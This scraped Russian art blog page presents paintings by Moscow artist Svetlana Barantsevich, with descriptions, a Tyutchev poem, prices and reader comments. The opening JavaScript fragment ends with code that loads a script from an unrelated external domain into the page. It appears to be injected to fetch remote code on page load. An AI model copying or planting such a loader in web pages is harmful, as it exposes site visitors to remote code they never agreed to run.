, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Картины Московской художницы Баранцевич Светланы

Автор: Дмитрий Алмазов | 17 Мар 2014

Здравствуйте, Уважаемые ценители классического и современного искусства. Сегодня хочу Вам представить работы Московской художницы Баранцевич Светланы. Считаю, что в ней скрыт огромный потенциал творчества.

Кто желает купить картины может написать мне в разделе контакты или позвонить. Все ниже представленные работы стоят пока в пределах 100$

Вот несколько из картин Светланы Баранцевич:

Картины Московской художницы Баранцевич Светланы

Картина Взгляд1. Картина  «Взгляд» , 40х50см.,  акрил,  холст, 2014.

Этот «Взгляд» как око сверху, который наблюдает за нами каждую секунду, так же, как бы  мы наблюдали  за этим миром всю свою жизнь.  Настает период , когда начинаешь задумываться, а кто ты, зачем ты здесь, какие силы тебя привели в этот мир. А что бы понять, нужно снять с глаз пелену, увидеть истину. Очиститься, до благости.

Часов однообразный бой,
Томительная ночи повесть!
Язык для всех равно чужой
И внятный каждому, как совесть!

Кто без тоски внимал из нас,
Среди всемирного молчанья,
Глухие времени стенанья,
Пророчески-прощальный глас?

Нам мнится: мир осиротелый
Неотразимый Рок настиг —
И мы, в борьбе, природой целой
Покинуты на нас самих.

Тютчев. Ф.И.

картина мысль2. Картина «Мысль»  20х30, Акрил, холст,  2012.

Тысячи и тысячи мыслей проносятся в нашем уме за одно, только моргание глаза, но только несколько мы можем воспринять.  Некоторые проносятся, но оставляют за собой след в виде  чего-то забытого.  Если бы мы могли осознавать все свои мысли, то сошли бы с ума. Мир фантазий и иллюзий, жизнь которую мы живем.

Картина деревоКартина « Дерево»  30х40 см. акрил, холст, 2011г..

Все просто. Раннее утро чашка чая,  и мечты. Мечты о теплом летнем солнце, о запахе утренней росы. О том, что все цветет и пахнет. Без лишних слов.

Картини СонКартина «Сон»  25х35см, акрил, холст, 2014г..

Дверь в потусторонний мир. Мир, о котором люди не должны знать и тем более быть в нем.  Но человеческое любопытство берем верх. Как маленький ребенок подглядывает в замочную скважину от любопытства, что же там за дверью прячется.  И ты заглядываешь и в ужасе понимаешь ,что мы не одни в этом мире.  Мы не одни и уж тем более не одиноки. Одиночества нет.

Темы: Интернет - Магазин, Художник | Отзывов: 2 »

Отзывов: 2 на “Картины Московской художницы Баранцевич Светланы”

  1. Елена пишет:
    23 Мар 2014 в 15:51

    Весьма необычное видение мира отражается в картинах современной художницы Светланы Баранцевич. В них скрыт глубинный смысл, который возможно не сразу всем становится понятен, но, безусловно, в Светлане есть огромный потенциал, остается только пожелать ей как можно ярче раскрыть его.

  2. Лики пишет:
    27 Мар 2014 в 22:12

    Работы Светланы мне чем-то напоминают раннего испанца –Пабло Пикассо.
    В картинах Светланы мы видим минимализм, который четко вписывается в ее неосюрреалистическое направление.
    Единственное, что я хочу посоветовать художнице, это разнообразить свою палитру яркими красками и оттенками. Ведь, на мой взгляд, ее полотнам не хватает цвета!

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress